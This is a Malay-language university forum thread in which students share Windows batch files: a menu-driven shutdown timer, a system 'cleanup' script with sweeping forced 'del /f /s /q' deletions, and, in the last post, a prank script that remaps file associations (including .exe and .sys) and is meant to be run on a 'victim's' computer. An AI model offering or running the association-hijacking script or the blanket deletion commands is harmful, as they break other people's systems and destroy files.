Log in
Quote of the Day
Latest topics
» [Lagu sedap~] Chris Medina - What Are Wordsby Admin Yesterday at 11:31 pm
» [Lagu sedap~] Taylor Swift - Eyes Open
by Admin Yesterday at 9:56 pm
» Diablo III Officially Announced, Release Date: Whenever it's finished :p (RPG)
by murasame_85 Yesterday at 6:38 pm
» Vindictus - How to play?
by sID Yesterday at 2:24 pm
» Toyota GT86
by murasame_85 Tue May 22, 2012 7:34 am
» MedialabStudio@Kaunter Tiket Bas Cuti Jumaat INI (25/5)- Isnin (28/5)
by jemin86 Mon May 21, 2012 10:37 pm
» Proton Shark ala CRZ
by murasame_85 Mon May 21, 2012 5:58 pm
» Penutupan sementara Kaunter TIKET BAS UMP
by samuraiz Mon May 21, 2012 5:39 pm
» Andoid tut Apple~
by samuraiz Mon May 21, 2012 5:37 pm
» the private scene behind Avengers~
by samuraiz Fri May 18, 2012 3:50 am
UMPlife Chatbox
Top posters
| MusTanG (4298) | ||||
| theMVP (3628) | ||||
| aku la????? (3355) | ||||
| cicok (3333) | ||||
| nazkill (3286) | ||||
| asuramaru (3189) | ||||
| zicron21ck (3150) | ||||
| Admin (2987) | ||||
| Castielle Zaidrick (2608) | ||||
| murasame_85 (2506) |
UMPlife Partner Board
UMPlife Chinese Forum
Suburbanzero
Rowie's Scribbles
- d0r! - d0r! ruL3z -
EVOLUSI SAGA FIORE
AM's LiFeZ RuLeS
Laman ServerRooms
MTA Studio
[@][p][!]
nama saya din
zicronzick blog
BudakSedangBelajar
UMPOpenSC
mishyanikookoo
MTA life
inilah kehidupanku
teratak silam
GERABAK MEKANIKAL
kuchenghitam
+ WE LEAD THE FUTURE+ (^^)/
UMP Store
kibotnmos
Shazril Shaedi
Bakpo Gitu?
Fadzrulhisyam
Blogger UMP
Secawan Kopi Panas...
Rionix
Invincible Generation
RoCkStaR site
sollehahn.com
c0l0r 0f my s0ul
I'm not Alone
umpsharing
Blog adib
Ahli Karut
darimo's blurp
lady afiefa
Black Winter
just4khai
blog404
UFun
UMPlife Sponsor
mari share batch file anda kt cni
Page 1 of 1 • Share •
mari share batch file anda kt cni
aku start dlu...n ak bt sdiri,bru blaja gk r
program untuk set mase untk shutdown komputer
@echo off
cls
color 0a
cls
:START
cls
echo Please select your option!
echo.
echo 1: Shutdown Computer
echo 2: Restart Computer
echo 3: Quit
set select=
set /p select=""
if '%select%'=='1' GOTO SHUTDOWN
if '%select%'=='2' GOTO RESTART
if '%select%'=='3' GOTO G
cls
echo '%select%' is invalid
echo Try again
GOTO START
:SHUTDOWN
cls
echo You are going to shutdown your computer
echo Set the desired time:
echo.
echo 0: Shutdown now
echo 1: 5 minutes
echo 2: 15 minutes
echo 3: 30 minutes
echo 4: 60 minutes
echo 5: 120 minutes
echo 6: Cancel
echo 7: Quit
set choice=
set /p choice=""
if '%choice%'=='0' GOTO A
if '%choice%'=='1' GOTO B
if '%choice%'=='2' GOTO C
if '%choice%'=='3' GOTO D
if '%choice%'=='4' GOTO E
if '%choice%'=='5' GOTO F
if '%choice%'=='6' GOTO START
if '%choice%'=='7' GOTO G
cls
echo "%choice%" is not valid
echo Try again
GOTO SHUTDOWN
:RESTART
cls
echo Restart computer now (y/n)
echo q: Quit
set yn=
set /p yn=""
if '%yn%'=='y' GOTO H
if '%yn%'=='n' GOTO START
if '%yn%'=='q' GOTO G
cls
echo '%yn%' is invalid
GOTO RESTART
:H
shutdown /r /t 5
end
cls
:A
shutdown /s /t 1
:B
shutdown /s /t 300
:C
shutdown /s /t 900
:D
shutdown /s /t 1800
:E
shutdown /s /t 3600
:F
shutdown /s /t 7200
:G
end
cls
program untuk set mase untk shutdown komputer
@echo off
cls
color 0a
cls
:START
cls
echo Please select your option!
echo.
echo 1: Shutdown Computer
echo 2: Restart Computer
echo 3: Quit
set select=
set /p select=""
if '%select%'=='1' GOTO SHUTDOWN
if '%select%'=='2' GOTO RESTART
if '%select%'=='3' GOTO G
cls
echo '%select%' is invalid
echo Try again
GOTO START
:SHUTDOWN
cls
echo You are going to shutdown your computer
echo Set the desired time:
echo.
echo 0: Shutdown now
echo 1: 5 minutes
echo 2: 15 minutes
echo 3: 30 minutes
echo 4: 60 minutes
echo 5: 120 minutes
echo 6: Cancel
echo 7: Quit
set choice=
set /p choice=""
if '%choice%'=='0' GOTO A
if '%choice%'=='1' GOTO B
if '%choice%'=='2' GOTO C
if '%choice%'=='3' GOTO D
if '%choice%'=='4' GOTO E
if '%choice%'=='5' GOTO F
if '%choice%'=='6' GOTO START
if '%choice%'=='7' GOTO G
cls
echo "%choice%" is not valid
echo Try again
GOTO SHUTDOWN
:RESTART
cls
echo Restart computer now (y/n)
echo q: Quit
set yn=
set /p yn=""
if '%yn%'=='y' GOTO H
if '%yn%'=='n' GOTO START
if '%yn%'=='q' GOTO G
cls
echo '%yn%' is invalid
GOTO RESTART
:H
shutdown /r /t 5
end
cls
:A
shutdown /s /t 1
:B
shutdown /s /t 300
:C
shutdown /s /t 900
:D
shutdown /s /t 1800
:E
shutdown /s /t 3600
:F
shutdown /s /t 7200
:G
end
cls

chakueh- Secondary Member

- Posts: 361
Join date: 24/08/2009
Age: 21
Location: tanah merah klate mlaysia
Re: mari share batch file anda kt cni
lol..trgkn la cmne fungsi bnde nih..die countdown ke hape..

sID- Secondary Member

- Posts: 356
Join date: 02/02/2009

Re: mari share batch file anda kt cni
sy pakai batch file ni utk clean rubbish files dlm laptop sy
@echo off
echo ready start cleaning rubbish files......
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
echo cleaning complete!
echo. & pause
ni kira batch files gak kan?
@echo off
echo ready start cleaning rubbish files......
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
echo cleaning complete!
echo. & pause
ni kira batch files gak kan?

Soon- Secondary Member

- Posts: 314
Join date: 01/11/2008
Age: 26
Location: Sitiawan,Perak

Re: mari share batch file anda kt cni
err..
bahasa coding per ni...
nk kene letak kat window ke kalu mahu try?
bahasa coding per ni...
nk kene letak kat window ke kalu mahu try?
_________________


theMVP- Moderator

- Posts: 3628
Join date: 24/10/2008
Age: 25
Location: Jay Bee

Re: mari share batch file anda kt cni
copy n paste sume tu dalam note pad,pastu save as name.bat
program aku wk tu untuk shutdown komputer
kte bleh set kn mase untuk shutdown
vista shj...xp ak xtry lg..
program aku wk tu untuk shutdown komputer
kte bleh set kn mase untuk shutdown
vista shj...xp ak xtry lg..

chakueh- Secondary Member

- Posts: 361
Join date: 24/08/2009
Age: 21
Location: tanah merah klate mlaysia
Re: mari share batch file anda kt cni
klu nk senang gune je bende ni 2k win xp shutdown -s -t 4000 -c "timer!!!!" copy dlm text pastu rename sebagai timer. batni 2k timer lebih krg 1 jam.klu nk lame lg just ubah nilai 4000 tue.. klu nk stop bende ni type jer shutdown -a kat run
Last edited by emnn on Sat Sep 12, 2009 12:09 am; edited 2 times in total

emnn- Beginner
- Posts: 44
Join date: 06/11/2008

Re: mari share batch file anda kt cni
ape mende sume ni??huhuhuhu..tak paham aku..cube terangkn skit... 

_________________
http://172.25.174.51/

GAME ON- Moderator

- Posts: 1797
Join date: 15/11/2008
Re: mari share batch file anda kt cni
hei emn..batch file yg ko wk tu hanye leh pakai lm xp je
yg ak wk tu tuk vista..huhu
vista laen plk care diye..
GAME ON
batch file n mrupakn command yg kte wk tuk com
dye akn papar kt cmd
ak xpandai nk ckp n
tnye la yg lebih otai..hahaa
yg ak wk tu tuk vista..huhu
vista laen plk care diye..
GAME ON
batch file n mrupakn command yg kte wk tuk com
dye akn papar kt cmd
ak xpandai nk ckp n
tnye la yg lebih otai..hahaa

chakueh- Secondary Member

- Posts: 361
Join date: 24/08/2009
Age: 21
Location: tanah merah klate mlaysia
Re: mari share batch file anda kt cni
chakueh wrote:hei emn..batch file yg ko wk tu hanye leh pakai lm xp je
yg ak wk tu tuk vista..huhu
vista laen plk care diye..
GAME ON
batch file n mrupakn command yg kte wk tuk com
dye akn papar kt cmd
ak xpandai nk ckp n
tnye la yg lebih otai..hahaa
lam vista pun jalan la bro.....
right click at desktop tu then ambik new and shortcut..
pstu tmpat location type je shutdown -s -t 4000 -c
then run jela sprti biase dye ak count la untuk shtdown..

Qorel- Secondary Member

- Posts: 229
Join date: 25/10/2009
Location: Klate(kk5)
Re: mari share batch file anda kt cni
ok..skung ak nk kongsi file batch yg ak buat..
tp igt nk gne nie risikonye tanggung sndiri lah..
sbb batch nie buat akn tkar ext dlm comp anda..
mudah kata lain mcm virus la..
copy ini dlm notepad dan save sbgai .bat
dan run kn dlm comp magsa anda..hehe
@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
msg Your System got Infected…..
exit
semoga berjaya...
tp igt nk gne nie risikonye tanggung sndiri lah..
sbb batch nie buat akn tkar ext dlm comp anda..
mudah kata lain mcm virus la..
copy ini dlm notepad dan save sbgai .bat
dan run kn dlm comp magsa anda..hehe
@echo off
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
msg Your System got Infected…..
exit
semoga berjaya...

Qorel- Secondary Member

- Posts: 229
Join date: 25/10/2009
Location: Klate(kk5)
Similar topics» Maklumbalas Anda
» jom kita share video porn terkini ..
» Sila perkenalkan diri anda... tp tdk wajiblah...
» kenali warna anda
» free file hosting server yg belum kena block
» jom kita share video porn terkini ..
» Sila perkenalkan diri anda... tp tdk wajiblah...
» kenali warna anda
» free file hosting server yg belum kena block
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum












